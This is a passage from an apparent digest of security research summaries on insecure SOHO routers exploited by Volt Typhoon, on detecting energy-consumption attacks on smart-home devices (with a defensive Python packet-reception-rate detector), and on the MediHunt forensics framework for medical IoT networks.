• User Negligence: Many users, including IT professionals, do not follow basic security practices such as changing default passwords or updating firmware, leaving routers exposed to attacks.
• Complexity in Identifying Vulnerable Devices: Identifying specific vulnerable devices is complex due to legal and technical issues, complicating the process of mitigating these vulnerabilities.
C. Affected Industries
The exploitation of insecure SOHO routers poses a significant threat across multiple sectors, highlighting the need for improved security practices and awareness.
1) Communications
• Data Breaches and Eavesdropping: Insecure routers can lead to unauthorized access to network traffic, allowing attackers to intercept sensitive communications.
• Disruption of Services: Compromised routers can be used to launch Distributed Denial of Service (DDoS) attacks, disrupting communication services.
2) Transportation
Infrastructure Vulnerability: The transportation sector relies heavily on networked systems for operations. Compromised routers could allow attackers to disrupt traffic management systems and logistics operations.
3) Water
Operational Technology (OT) Threats: Insecure routers can provide a gateway for attackers to target OT systems within
the water sector, potentially affecting water treatment and distribution systems.
4) Energy
Grid Security: The energy sector, particularly electric utilities, is at risk of targeted attacks through insecure routers. Attackers could gain access to control systems, posing a threat to the stability of the power grid.
5) Other Industries
• Healthcare: Insecure routers can compromise patient data and disrupt medical services by providing attackers access to healthcare networks.
• Retail and Hospitality: These sectors are vulnerable to data breaches involving customer information and financial transactions due to insecure network devices.
• Manufacturing: Industrial control systems can be compromised through insecure routers, affecting production lines and industrial processes.
• Education: Schools and universities are at risk of data breaches and disruption of educational services.
• Government and Public Sector: Insecure routers can lead to unauthorized access to government networks, risking sensitive information and critical services.
D. Key Findings on Malicious Cyber Actors Exploiting Insecure SOHO Routers
• Exploitation by State-Sponsored Groups: The People's Republic of China (PRC)-sponsored Volt Typhoon group is actively compromising SOHO routers by exploiting software defects. These compromised routers are then used as launching pads to further compromise U.S. critical infrastructure entities.
• Impact on Critical Infrastructure: Compromised SOHO routers pose a significant threat as they can be used to move laterally within networks and further compromise critical infrastructure sectors in the U.S., including communications, energy, transportation, and water sectors.
• ZuoRAT Campaign: A sophisticated campaign leveraging infected SOHO routers, dubbed ZuoRAT, has been identified. This campaign involves a multistage remote access trojan (RAT) developed for SOHO devices, enabling attackers to maintain a low-detection presence on target networks and exploit sensitive information.
• FBI's Response to Chinese Malware: The FBI has taken proactive measures to disrupt the activities of Chinese hackers, specifically targeting SOHO routers infected with the KV Botnet malware. This involved issuing covert commands to infected devices to remove the malware and prevent further access by the hackers, highlighting the ongoing efforts to counteract the threats posed by compromised SOHO routers.
1) Tactics and Techniques
• KV Botnet Malware: Volt Typhoon actors have implanted KV Botnet malware into end-of-life Cisco and NETGEAR SOHO routers, which are no longer supported with security patches or software updates.
• Concealment of Origin: By routing their malicious activities through SOHO routers, these actors can conceal the PRC origin of their hacking activities, making it more challenging to detect and attribute the attacks.
• Targeting Personal Emails: Volt Typhoon actors have been observed targeting the personal emails of key network and IT staff to gain initial access to networks.
• Use of Multi-Hop Proxies: For command and control (C2) infrastructure, the actors use multi-hop proxies typically composed of virtual private servers (VPSs) or SOHO routers.
• Living Off the Land (LOTL) Techniques: Instead of relying on malware for post-compromise execution, Volt Typhoon actors use hands-on-keyboard activity via command-line and other native tools and processes on systems, a strategy known as LOTL, to maintain and expand access to victim networks.
• Man-in-the-Middle Attacks: Attackers can exploit vulnerabilities in routers to intercept and manipulate data passing through the network, leading to data breaches, identity theft, and espionage.
• Gateway to Further Exploitation: Once compromised, a router can serve as a gateway for attackers to launch further attacks on connected devices, including computers, smartphones, and smart home devices.
• Botnet Recruitment: Insecure routers can be easily compromised and recruited into botnets, large networks of infected devices used to launch distributed denial-of-service (DDoS) attacks, spam campaigns, and other malicious activities.
2) Impact and Response
• Public-Private Partnerships: The response to the Volt Typhoon compromises involved close collaboration between government agencies, including the FBI and CISA, and private sector entities. This partnership facilitated the sharing of threat intelligence, technical indicators of compromise (IoCs), and best practices for mitigation.
• Firmware Analysis and Patching: Manufacturers of affected SOHO routers were alerted to the vulnerabilities being exploited by Volt Typhoon actors. Efforts were made to analyze the malicious firmware, understand the exploitation techniques, and develop patches to address the vulnerabilities.
• Disruption Operations: Law enforcement and cybersecurity agencies undertook operations to disrupt the Volt Typhoon campaign. This included identifying and taking down C2 servers, removing malicious firmware from compromised routers, and blocking traffic to known malicious IP addresses.
• Global Notification and Mitigation Campaign: A global campaign was launched to notify owners of compromised SOHO routers and provide them with guidance on mitigating the threat. This included
instructions for resetting devices to factory settings, updating firmware, and changing default passwords.
• Disruption of Critical Infrastructure: The exploitation of these routers poses a significant threat as it could potentially disrupt essential services provided by critical infrastructure sectors.
• Federal Response: The FBI and the Justice Department have conducted operations to disrupt the KV Botnet by remotely deleting the malware from infected routers and taking steps to sever their connection to the botnet.
• Mitigation Efforts: The FBI has been notifying owners or operators of SOHO routers that were accessed during the takedown operation. The mitigation steps authorized by the court are temporary, and a router restart without proper mitigation will leave the device vulnerable to reinfection.
• Secure by Design: CISA and the FBI urge SOHO router manufacturers to build security into the design, development, and maintenance of SOHO routers to eliminate the paths these threat actors take to compromise devices and critical infrastructure entities.
• Transparency and Disclosure: Manufacturers are encouraged to protect against Volt Typhoon activity and other cyber threats by disclosing vulnerabilities through the CVE program and accurately classifying them using the CWE system.
• User Vigilance: Device operators are advised to update software, harden configurations, and add security solutions where necessary to combat threats.
3) Public and Customer Demand for Security
In today's digital age, the security of network devices has become a paramount concern for both the public and businesses alike. This heightened awareness stems from an increasing number of high-profile cyberattacks and data breaches, which have underscored the vulnerabilities inherent in connected devices. As a result, there is a growing demand from customers and the public for manufacturers to prioritize security in their products.
a) Factors Driving Demand
• Increased Awareness of Cyber Threats: The general public and businesses are becoming more aware of the risks associated with cyber threats, including the potential for financial loss, privacy breaches, and disruption of services.
• Regulatory Pressure: Governments and regulatory bodies worldwide are implementing stricter regulations and standards for cybersecurity, compelling manufacturers to enhance the security features of their products.
• Economic Impact of Cyberattacks: The economic repercussions of cyberattacks, including the cost of recovery and the impact on brand reputation, have made security a critical consideration for customers when selecting products.
• Interconnectedness of Devices: The proliferation of IoT devices and the interconnectedness of digital ecosystems have amplified the potential impact of compromised devices, making security a top priority for ensuring the integrity of personal and corporate data.
b) Customer Expectations
• Built-in Security Features: Customers now expect devices to come with robust, built-in security features that protect against a wide range of threats without requiring extensive technical knowledge to configure.
• Regular Security Updates: There is an expectation for manufacturers to provide regular and timely security updates to address new vulnerabilities as they are discovered.
• Transparency: Customers demand transparency from manufacturers regarding the security of their products, including clear information about known vulnerabilities and the steps being taken to address them.
• Ease of Use: While demanding high levels of security, customers also expect these features to be user-friendly and not to impede
4) Manufacturer Responsibility
a) Core Elements of Secure by Design
• Security as a Foundational Requirement: Security must be considered a primary requirement, akin to functionality, usability, and performance. This means integrating security considerations into the product design, development lifecycle, and architectural decisions.
• Minimization of Attack Surfaces: Reducing the number of potential points of attack within a system, which involves limiting the functionality and access rights of the system to only what is necessary for its operation.
• Default Secure Settings: Products should ship with secure settings by default, requiring users to make conscious decisions to weaken security. This includes strong default passwords, disabled unnecessary services, and enabled encryption.
• Principle of Least Privilege: Ensuring that processes, users, and systems operate using the minimum set of privileges necessary to perform their tasks. This limits the potential damage from an exploit or breach.
• Secure Failure: Designing systems to fail securely in the event of a compromise. This means that when a system encounters an error or breach, it defaults to a state that minimizes risk and exposure.
• Security Through Transparency: Encouraging openness about the design and implementation of security features, allowing for public scrutiny and peer review. This transparency helps identify and rectify vulnerabilities more effectively.
• Privacy by Design: Integrating privacy considerations into product development, ensuring that user data is protected and handled responsibly.
b) Implementing Secure by Design in SOHO Routers
• Automatic Updates: Implementing mechanisms for automatic firmware updates to ensure that routers are always running the latest version with the most recent security patches. This reduces the reliance on users to manually update their devices.
• Digital Signing: Ensuring that updates are digitally signed to verify their authenticity and integrity. This prevents the installation of malicious firmware updates that could compromise the router.
• Secure Web Management Interface: Placing the web management interface on LAN-side ports and improving its security to allow safe usage when exposed to the public internet.
• Secure Defaults: Shipping routers with secure configurations by default, such as strong, unique passwords and disabled unnecessary services, while users should be warned against insecure configurations.
• Access Controls: Allowing access to the router's web management interface only from the LAN side by default and providing options to securely enable remote management if needed.
• Encryption: Utilizing strong encryption for the web management interface to protect communications between the router and the user.
• Authentication: Implementing strong authentication mechanisms, including the option for MFA, to secure access to the router's management interface.
• Vulnerability Disclosure and Patching: Establishing a clear, responsible disclosure policy for vulnerabilities and providing timely patches. This includes participating in the CVE program to track and disclose vulnerabilities.
• End-of-Life Support: Clearly communicating the end-of-life (EOL) policy for products and providing support and updates throughout the product's lifecycle are critical. For devices that are no longer supported, manufacturers should offer guidance on secure disposal or replacement.
c) Challenges and Considerations
• Balancing Security and Usability: One of the challenges is maintaining user-friendliness. Security measures should not overly complicate the user experience.
• Cost Implications: Developing secure products can incur additional costs. However, the long-term benefits of reducing the risk of breaches and attacks justify these investments.
• Continuous Evolution: Security is not a one-time effort but requires ongoing attention to adapt to new threats and vulnerabilities.
• Building Trust: By prioritizing security, manufacturers can build trust with customers, differentiating their products in a competitive market.
• Engaging with Customers: Actively engaging with customers to understand their security concerns and providing clear, accessible information on how to secure their devices.
• Global Supply Chain: Routers are often produced as part of a complex global supply chain. Ensuring security across this chain, from component manufacturers to final assembly, requires coordination and adherence to security best practices at every stage.
• Industry Collaboration: Working with industry peers, security organizations, and regulatory bodies to establish and adhere to security best practices.
E. Consequences
• Widespread Vulnerabilities: A significant number of vulnerabilities, some 226 in total, collectively pose a substantial security risk.
• Outdated Components: Core components such as the Linux kernel and additional services like VPN or multimedia software in these routers are often outdated, making them susceptible to known exploits.
• Default Passwords and Unencrypted Connections: Many routers come with easy-to-guess default passwords and use unencrypted connections, which can be easily exploited by attackers.
• Compromised Devices and Data: Once a router is compromised, all devices protected by its firewall become vulnerable, allowing attackers to monitor, redirect, block, or tamper with data.
• Risk to Critical Infrastructure: Compromised routers can be used to attack critical infrastructure, potentially disrupting essential services in communications, energy, transportation, and water sectors.
• DoS and Traffic Interception: Vulnerabilities in protocols can lead to denial-of-service attacks against host services and interception of both internal and external traffic.
• Eavesdropping and Attacks: Attackers can eavesdrop on traffic and launch further network-based attacks, making it difficult for users to detect a breach due to minimal router user interfaces.
• Potential for Large-Scale Exploitation: The sheer number of vulnerable devices, estimated in the millions, indicates a significant potential for widespread exploitation by malicious actors.
• Legal and Technical Challenges: Identifying specific vulnerable devices is complex due to legal and technical issues, which complicates the process of mitigating these vulnerabilities.

52
Read more: Boosty | Sponsr | TG

DETECTION OF ENERGY CONSUMPTION CYBER ATTACKS ON SMART DEVICES

Abstract – The paper "Detection of Energy Consumption Cyber Attacks on Smart Devices" highlights the growing integration of IoT technology in smart homes and the associated security challenges due to resource constraints and unreliable networks. It presents a lightweight technique for detecting energy consumption attacks by analyzing received packets, considering TCP, UDP, and MQTT protocols, and promptly alerting administrators upon detecting abnormal behavior, effectively identifying such attacks through packet reception rate measurements.

A. Introduction
The paper "Detection of Energy Consumption Cyber Attacks on Smart Devices" emphasizes the rapid integration of IoT technology into smart homes, highlighting the associated security challenges due to resource constraints and unreliable networks.
• Energy Efficiency: It emphasizes the significance of energy efficiency in IoT systems, particularly in smart home environments, for comfort, convenience, and security.
• Vulnerability: It discusses the vulnerability of IoT devices to cyberattacks and physical attacks due to their resource constraints. It underscores the necessity of securing these devices to ensure their effective deployment in real-world scenarios.
• Proposed Detection Framework: The authors propose a detection framework based on analyzing the energy consumption of smart devices. This framework aims to classify the attack status of monitored devices by examining their energy consumption patterns.
• Two-Stage Approach: The methodology involves a two-stage approach. The first stage uses a short time window for rough attack detection, while the second stage involves more detailed analysis.
• Lightweight Algorithm: The paper introduces a lightweight algorithm designed to detect energy consumption attacks on smart home devices. This algorithm is tailored to the limited resources of IoT devices and considers three different protocols: TCP, UDP, and MQTT.
• Packet Reception Rate Analysis: The detection technique relies on analyzing the packet reception rate of smart devices to identify abnormal behavior indicative of energy consumption attacks.

B. Benefits and drawbacks
These benefits and drawbacks provide a balanced view of the proposed detection framework's capabilities and limitations, highlighting its potential for improving smart home security.
1) Benefits
• Lightweight Detection Algorithm: The proposed algorithm is designed to be lightweight, making it suitable for resource-constrained IoT devices. This ensures that the detection mechanism does not overly burden the devices it aims to protect.
• Protocol Versatility: The algorithm considers multiple communication protocols (TCP, UDP, MQTT), enhancing its applicability across various types of smart devices and network configurations.
• Two-Stage Detection Approach: The use of a two-stage detection approach (short and long time windows) improves the accuracy of detecting energy consumption attacks while minimizing false positives. This method allows for both quick initial detection and detailed analysis.
• Real-Time Alerts: The framework promptly alerts administrators upon detecting an attack, enabling quick response and mitigation of potential threats.
• Effective Anomaly Detection: By measuring packet reception rates and analyzing energy consumption patterns, the algorithm effectively identifies deviations from normal behavior, which are indicative of cyberattacks.
2) Drawbacks
• Limited Attack Scenarios: The experimental setup tested only specific types of attacks, which limits the generalizability of the results to other potential attack vectors not covered in the study.
• Scalability Concerns: While the algorithm is designed to be lightweight, its scalability in larger, more complex smart home environments with numerous devices and varied network conditions may require further validation.
• Dependency on Baseline Data: The effectiveness of the detection mechanism relies on accurate baseline measurements of packet reception rates and energy consumption. Any changes in the normal operating conditions of the devices could affect the baseline, potentially leading to false positives or negatives.
• Resource Constraints: Despite being lightweight, the algorithm still requires computational resources, which might be a challenge for extremely resource-limited devices. Continuous monitoring and analysis could also impact the battery life and performance of these devices.

C. Proposed Algorithm
It highlights the role of machine learning (ML) algorithms in intrusion detection systems (IDS) and the challenges associated with their deployment on resource-constrained IoT devices. It reviews existing studies on ML-based IDS, emphasizing the need for on-device ML models to reduce latency and enhance data privacy, and sets the stage for the proposed comparative analysis of energy consumption in different ML deployment scenarios.
1) Packet Measurements
• Packet Reception Rate (PRR): The section discusses the use of Packet Reception Rate (PRR) as a key metric for detecting energy consumption attacks. PRR is defined as the ratio of successfully received packets to the total number of packets sent over a network.
• Protocol Consideration: The algorithm considers different communication protocols, including TCP, UDP, and MQTT, to measure PRR. Each protocol has unique characteristics that affect packet transmission and reception.
• Abnormal Behavior Detection: By monitoring the PRR, the algorithm can identify deviations from normal behavior, which may indicate the presence of an attack. A significant drop in PRR can be a sign of an ongoing energy consumption attack.
2) Energy Measurements
• Energy Consumption Analysis: This section focuses on analyzing the energy consumption patterns of smart devices to detect anomalies. The algorithm measures the energy consumed by devices over time and compares it to expected consumption levels.
• Short and Long Time Windows: The proposed method uses a two-stage approach with short and long time windows. The short time window is used for initial, rough detection of potential attacks, while the long time window provides a more detailed analysis to confirm the presence of an attack.
• Detection of Specific Attacks: The energy measurements help in identifying specific types of attacks, such as Denial of Service (DoS) or Distributed Denial of Service (DDoS) attacks, by detecting unusual spikes or drops in energy consumption.

D. Experiments
The experiments were conducted in a simulated smart home environment with various IoT devices, and different types of energy consumption attacks were simulated to evaluate the proposed detection framework. The results show that the Decision Tree (DT) algorithm deployed on-device offers better performance in terms of inference time and power consumption compared to other ML models.
1) Experimental Setup
• Smart Home Testbed: The experiments were conducted in a simulated smart home environment consisting of various IoT devices like smart lights, security cameras, and smart speakers communicating over different protocols (TCP, UDP, MQTT).
• Attack Scenarios: The authors simulated different types of energy consumption attacks, such as Denial of Service (DoS), Distributed Denial of Service (DDoS), and energy consumption-based DDoS (EC-DDoS) attacks, to evaluate the proposed detection framework's effectiveness.
• Baseline Measurements: Baseline packet reception rates (PRRs) and energy consumption levels were established for the smart devices under normal operating conditions to serve as a reference for detecting anomalies.
• Performance Metrics: The experimental setup included the definition of performance metrics, such as detection accuracy, false positive rate, and computational overhead, to assess the algorithm's effectiveness.
2) Results and Analysis
• Packet Reception Rate Analysis: The results section analyzes the changes in packet reception rates (PRRs) observed during the simulated attacks, demonstrating the algorithm's ability to detect deviations from normal behavior.
• Energy Consumption Analysis: The paper presents an analysis of the energy consumption patterns of the smart devices, highlighting the algorithm's capability to identify abnormal energy usage indicative of attacks.
• Two-Stage Approach Evaluation: The authors evaluate the effectiveness of the proposed two-stage approach, which uses a short time window for initial rough detection and a longer time window for detailed analysis, in improving detection accuracy and reducing false positives.
• Protocol-Specific Observations: The results may include observations specific to the different communication protocols (TCP, UDP, MQTT) used in the experiments, discussing their impact on packet reception rates and energy consumption patterns during attacks.
• Performance Evaluation: The authors present an evaluation of the algorithm's performance based on the defined metrics, such as detection accuracy, false positive rate, and computational overhead, comparing it to existing techniques or baselines.

E. Conclusion
It emphasizes the effectiveness of the proposed lightweight detection framework in identifying energy consumption cyberattacks on smart devices, highlighting its high detection accuracy and low false positive rate. The section also discusses the scalability and efficiency of the framework in real-world smart home environments and suggests several future research directions.
• Summary of Findings: It highlights the successful use of packet reception rate (PRR) and energy consumption patterns to detect anomalies.
• Algorithm Performance: The authors emphasize the high detection accuracy and low false positive rate achieved by the two-stage detection approach, which uses both short and long time windows for analysis.
• Scalability and Efficiency: The framework's scalability and efficiency in real-world smart home environments are discussed, noting its suitability for resource-constrained IoT devices.
• Future Research Directions: The authors suggest several future research directions, including:
o Extending the framework to cover a broader range of attack types and smart devices.
o Enhancing the algorithm to improve detection speed and reduce computational overhead.
o Investigating the integration of additional data sources, such as network traffic and device behavior logs, to enhance detection capabilities.
o Exploring the use of advanced machine learning techniques to further improve the accuracy and robustness of the detection framework.
• Implications for Smart Home Security: The discussion section elaborates on the implications of the proposed detection framework for enhancing the security of smart home environments. It underscores the importance of protecting IoT devices from energy consumption attacks to ensure the reliability and safety of smart homes.
• Comparison with Existing Techniques: The authors compare their approach with existing anomaly detection techniques, highlighting the advantages of their lightweight, two-stage method in terms of accuracy, efficiency, and suitability for resource-limited devices.
• Challenges and Limitations: The discussion acknowledges the challenges and limitations encountered during the study, such as the need for continuous model updates to adapt to evolving attack patterns and the potential impact of network conditions on detection performance.
• Practical Applications: The potential practical applications of the detection framework are explored, including its deployment in commercial smart home systems and its integration with existing security solutions to provide comprehensive protection against cyberattacks.
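As an added illustration of the PRR-based, two-stage detection summarised above (not the paper's code), the following Python computes the packet reception rate over a short window for a rough verdict and only then confirms it over a longer window against a per-protocol baseline, so a brief dip never becomes an alert on its own. The window sizes, threshold ratios, baseline values and the traffic samples are assumptions constructed for the demo.

```python
"""Two-stage packet reception rate (PRR) anomaly detector (added example)."""
from collections import deque
from typing import Deque, Iterable, List, Tuple

Sample = Tuple[int, int]  # (packets sent, packets received) in one interval

NORMAL, SUSPECT, ATTACK = "normal", "suspect", "attack"


def prr(samples: Iterable[Sample]) -> float:
    """PRR = successfully received packets / packets sent over the window."""
    sent = received = 0
    for s, r in samples:
        sent += s
        received += r
    return received / sent if sent else 1.0


class PrrDetector:
    """Stage 1 (short window) flags a suspect drop; stage 2 (long window)
    confirms it against the baseline before an attack is reported."""

    def __init__(self, baseline_prr: float, short_window: int = 5,
                 long_window: int = 20, short_ratio: float = 0.7,
                 long_ratio: float = 0.85) -> None:
        self.short: Deque[Sample] = deque(maxlen=short_window)
        self.long: Deque[Sample] = deque(maxlen=long_window)
        # Thresholds are fractions of the device's measured baseline (assumed values)
        self.short_threshold = short_ratio * baseline_prr
        self.long_threshold = long_ratio * baseline_prr

    def observe(self, sample: Sample) -> str:
        self.short.append(sample)
        self.long.append(sample)
        # Stage 1: cheap check over the last few intervals only
        if prr(self.short) >= self.short_threshold:
            return NORMAL
        # Stage 2: the longer analysis runs only once stage 1 has fired,
        # so a transient dip is reported as suspect, not as an attack
        if prr(self.long) < self.long_threshold:
            return ATTACK
        return SUSPECT


def run_detector(baseline_prr: float, samples: Iterable[Sample]) -> List[str]:
    """Feed per-interval samples in order and return one verdict per interval."""
    det = PrrDetector(baseline_prr)
    return [det.observe(s) for s in samples]


# Assumed per-protocol baselines measured under normal operating conditions;
# datagram traffic (UDP) is assumed to lose slightly more than TCP or MQTT.
BASELINE_PRR = {"TCP": 0.99, "UDP": 0.95, "MQTT": 0.98}

# Constructed traffic: 20 normal intervals, then a sustained drop in delivered
# packets of the kind an energy-draining flood would cause.
SUSTAINED_DROP = [(100, 99)] * 20 + [(100, 40)] * 10
# Constructed traffic: two bad intervals (transient congestion), then recovery.
TRANSIENT_DIP = [(100, 99)] * 20 + [(100, 20)] * 2 + [(100, 99)] * 8


def alert_on_attack(protocol: str, samples: Iterable[Sample]) -> int:
    """Return the 0-based interval at which an attack is first confirmed, or -1."""
    verdicts = run_detector(BASELINE_PRR[protocol], samples)
    return verdicts.index(ATTACK) if ATTACK in verdicts else -1


if __name__ == "__main__":
    for name, traffic in (("sustained drop", SUSTAINED_DROP), ("transient dip", TRANSIENT_DIP)):
        print(name, run_detector(BASELINE_PRR["MQTT"], traffic))
        print("  attack confirmed at interval:", alert_on_attack("MQTT", traffic))
```

With the MQTT baseline the sustained drop is flagged suspect at interval 22 and confirmed at interval 25, while the transient dip is only ever reported as suspect; the looser UDP baseline confirms the same drop one interval later.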

MEDIHUNT

Abstract – The paper "MediHunt: A Network Forensics Framework for Medical IoT Devices" presents the development of the MediHunt framework, designed for real-time detection of network flow-based traffic attacks in MQTT networks, which are commonly used in smart hospital environments. MediHunt can detect a variety of TCP/IP layer and application layer attacks on MQTT networks by leveraging machine learning models. The framework aims to enhance the forensic analysis capabilities in MIoT environments, ensuring effective tracing and mitigation of malicious activities.

A. Introduction
The paper "MediHunt: A Network Forensics Framework for Medical IoT Devices" addresses the need for robust network forensics in Medical Internet of Things (MIoT) environments, particularly focusing on MQTT (Message Queuing Telemetry Transport) networks. These networks are commonly used in smart hospital environments for their lightweight communication protocol. It highlights the challenges in securing MIoT devices, which are often resource-constrained and have limited computational power. The lack of publicly available flow-based MQTT-specific datasets for training attack detection systems is mentioned as a significant challenge.

The paper presents MediHunt as an automatic network forensics solution designed for real-time detection of network flow-based traffic attacks in MQTT networks. It aims to provide a comprehensive solution for data collection, analysis, attack detection, presentation, and preservation of evidence. It is designed to detect a variety of TCP/IP layer and application layer attacks on MQTT networks. It leverages machine learning models to enhance the detection capabilities and is suitable for deployment on resource-constrained MIoT devices.

The primary objective of MediHunt is to strengthen the forensic analysis capabilities in MIoT environments, ensuring that malicious activities can be traced and mitigated effectively.

B. Benefits and drawbacks of proposed solution
1) Benefits
• Real-time Attack Detection: MediHunt is designed to detect network flow-based traffic attacks in real time, which is crucial for mitigating potential damage and ensuring the security of MIoT environments.
• Comprehensive Forensic Capabilities: The framework provides a complete solution for data collection, analysis, attack detection, presentation, and preservation of evidence. This makes it a robust tool for network forensics in MIoT environments.
• Machine Learning Integration: By leveraging machine learning models, MediHunt enhances its detection capabilities. The use of a custom dataset that includes flow data for both TCP/IP layer and application layer attacks allows for more accurate and effective detection of a wide range of cyber-attacks.
• High Performance: The framework has demonstrated high performance, with F1 scores and detection accuracy exceeding 0.99, indicating that it is highly reliable in detecting attacks on MQTT networks.
• Resource Efficiency: Despite its comprehensive capabilities, MediHunt is designed to be resource-efficient, making it suitable for deployment on resource-constrained MIoT devices like Raspberry Pi.
2) Drawbacks
• Dataset Limitations: While MediHunt uses a custom dataset for training its machine learning models, the creation and maintenance of such datasets can be challenging. The dataset needs to be regularly updated to cover new and emerging attack scenarios.
• Resource Constraints: Although MediHunt is designed to be resource-efficient, the inherent limitations of MIoT devices, such as limited computational power and memory, can still pose challenges. Ensuring that the framework runs smoothly on these devices without impacting their primary functions can be difficult.
• Complexity of Implementation: Implementing and maintaining a machine learning-based network forensics framework can be complex. It requires expertise in cybersecurity and machine learning, which may not be readily available in all healthcare settings.
• Dependence on Machine Learning Models: The effectiveness of MediHunt heavily relies on the accuracy and robustness of its machine learning models. These models need to be trained on high-quality data and regularly updated to remain effective against new types of attacks.
• Scalability Issues: While the framework is suitable for small-scale deployments on devices like Raspberry Pi, scaling it up to larger, more complex MIoT environments may present additional challenges. Ensuring consistent performance and reliability across a larger network of devices can be difficult.

C. MediHunt vs other frameworks
MediHunt stands out among network forensics frameworks, particularly in the context of Medical Internet of Things (MIoT) environments, due to its specialized focus, performance, and accuracy. When comparing MediHunt to other network forensics frameworks, several key aspects highlight its distinctiveness and effectiveness:
• Specialized Focus on MIoT: Unlike many network forensics frameworks, MediHunt is specifically designed for the MIoT domain. This specialization allows it to address the unique challenges and requirements of medical IoT devices, such as resource constraints and the need for real-time attack detection.
• Real-time Attack Detection: MediHunt's capability to detect attacks in real time is a significant advantage. This feature is crucial for MIoT environments where timely detection can prevent potential harm to patients and healthcare operations. MediHunt's implementation is tailored to the lightweight nature of MIoT devices, ensuring minimal impact on device performance.
• Performance and Accuracy: MediHunt demonstrates exceptional performance and accuracy in detecting network attacks. With F1 scores and detection accuracy exceeding 0.99, it surpasses many existing frameworks in its ability to accurately identify malicious activities without a high rate of false positives. This level of accuracy is particularly important in healthcare settings, where false alarms can have serious implications.
• Resource Efficiency: Despite its comprehensive capabilities, MediHunt is designed to be resource-efficient, making it suitable for deployment on resource-constrained MIoT devices. This contrasts with some other frameworks that may require more substantial computational resources, making them less viable for deployment in MIoT scenarios.
• Machine Learning Integration: MediHunt leverages machine learning models to enhance its attack detection capabilities. While other frameworks also use machine learning, MediHunt's approach is specifically tuned for the types of attacks prevalent in MIoT networks, using a custom dataset that includes flow data for both TCP/IP layer and application layer attacks.
• Dataset and Model Training: The custom dataset for training machine learning models is another aspect where MediHunt stands out. Many frameworks struggle with the lack of comprehensive datasets for training, especially in the context of MIoT. MediHunt addresses this gap by leveraging a dataset that covers a wide range of attack scenarios relevant to MIoT environments.

D. Related Work
1) Overview of Existing Forensic Frameworks
This review highlights the strengths and limitations of existing network forensic frameworks and their applications across different domains. For instance, traditional digital forensics frameworks are well-established and have been extensively used in various contexts, but they often fall short when applied to the unique and complex environments of IoT systems. The frameworks discussed include those that focus on device forensics, network forensics, and cloud forensics, each with its own set of methodologies and tools designed to address specific forensic challenges.
2) Challenges in MIoT Forensics
The section emphasizes the unique challenges faced in Medical Internet of Things (MIoT) forensics. One of the primary challenges is the resource constraints of MIoT devices, which often have limited computational power, memory, and storage capabilities. This makes it difficult to implement traditional forensic tools and techniques. Additionally, there is a significant lack of comprehensive datasets for training machine learning models, which are crucial for effective attack detection and forensic analysis. The heterogeneity of MIoT devices, with their varied operating systems, communication protocols, and data formats, complicates the forensic process.
3) Comparison with Traditional Forensics
A comparison is made between traditional digital forensics and IoT forensics. Traditional digital forensics typically deals with well-defined and homogeneous environments, such as personal computers and servers, where standard tools and techniques can be effectively applied. In contrast, IoT forensics must contend with a highly heterogeneous and resource-constrained environment. Conventional forensic tools are often inadequate for IoT systems, which require specialized approaches to handle the diverse and dynamic nature of IoT devices and networks.
4) Use of Machine Learning
The section discusses the application of machine learning (ML) techniques in network forensics, particularly for detecting and analyzing network traffic anomalies. Machine learning offers significant potential for improving the accuracy and efficiency of forensic investigations by identifying patterns and anomalies in network traffic that may indicate malicious activity. However, the effectiveness of ML models depends heavily on the availability of high-quality datasets that cover a wide range of attack scenarios. The need for specific datasets tailored to the characteristics of MQTT-based IoT systems is particularly highlighted.
5) Existing Datasets
A review of existing datasets used for training machine learning models in network forensics is provided. These datasets are critical for developing and validating ML models, but they often have limitations in terms of diversity and comprehensiveness. Many existing datasets do not adequately represent the variety of attack scenarios that can occur in MQTT-based IoT systems, which limits the effectiveness of the trained models. The section underscores the importance of developing more comprehensive and representative datasets to improve the performance of ML-based forensic tools.
6) Gap in Literature
Finally, the section identifies gaps in the current literature on MIoT forensics. One of the key gaps is the need for real-time attack detection capabilities, which are essential for promptly identifying and mitigating threats in MIoT environments. Additionally, there is a need for improved methods for preserving forensic evidence, ensuring that it remains intact and admissible in legal proceedings. Addressing these gaps is crucial for advancing the field of MIoT forensics and enhancing the security and reliability of medical IoT systems.

E. Proposed Network Forensics Framework
• Framework Design: MediHunt is designed to address the specific challenges of network forensics in MIoT environments, particularly focusing on the MQTT protocol. It aims to detect attacks in real time and preserve the necessary logs for forensic analysis.
• Real-time Attack Detection: The capability to detect cyber-attacks as they happen is crucial for mitigating potential damage and for the immediate initiation of forensic analysis.
• Log Storage Mechanism: Given the memory constraints of MIoT devices, MediHunt incorporates an efficient log storage mechanism. It ensures that logs relevant to detected attacks are stored for further analysis without overwhelming the storage capacity.
• Machine Learning Integration: MediHunt leverages ML techniques to enhance its attack detection capabilities. It utilizes a custom dataset that includes flow data for both TCP/IP layer and application layer attacks, addressing the lack of datasets for MQTT-based IoT systems.
• Dataset and Model Training: The custom dataset used in MediHunt covers a wide range of attack scenarios, enabling the training of ML models to recognize various types of cyber-attacks. Six different ML models were trained and evaluated for their effectiveness in real-time attack detection.
• Performance Metrics: MediHunt's effectiveness is quantitatively measured using F1 scores and detection accuracy, and it achieved high performance exceeding 0.99, indicating its reliability in detecting attacks on MQTT networks.
• Comprehensive Forensic Analysis: Beyond attack detection, MediHunt facilitates a comprehensive forensic analysis process. It supports the collection, analysis, presentation, and preservation of digital evidence, adhering to principles of network forensics.
• Resource Efficiency: MediHunt is designed to be resource-efficient, making it suitable for deployment on resource-constrained MIoT devices.

F. ML model training
1) MQTT Network Traffic Data Collection
• Types of Data Collected: The data collected includes both normal and attack traffic. This ensures that the dataset is comprehensive and can be used to train machine learning models effectively.
• Flow-Based Data: The collected flow-based data includes information about the communication flows between devices. This type of data is crucial for detecting anomalies and attacks in network traffic.
• Attack Scenarios: Various attack scenarios are simulated to generate attack traffic, including TCP/IP and application layer attacks specific to MQTT.
• Dataset Generation: The collected data is processed to generate a dataset that can be used for training machine learning models. This dataset includes labeled instances of both normal and attack traffic.
2) ML Model Training and Performance Analysis
• Machine Learning Models: Six different models are evaluated, including decision trees, random forests, support vector machines, and neural networks.
• Training Process: The training process involves using the generated dataset to train the machine learning models. The models are trained to recognize patterns in the data that indicate normal or attack traffic.
• Performance Metrics: The performance of the trained models is evaluated using metrics such as F1 score and detection accuracy, which provide a quantitative measure of the models' effectiveness in detecting attacks.
• High Performance: F1 scores and detection accuracy exceeding 0.99 indicate high effectiveness in detecting attacks in real time.
• Real-Time Detection: The trained models are integrated into the MediHunt framework to enable real-time detection of attacks. This allows for immediate response and mitigation of potential threats.

G. Evaluation on Raspberry Pi
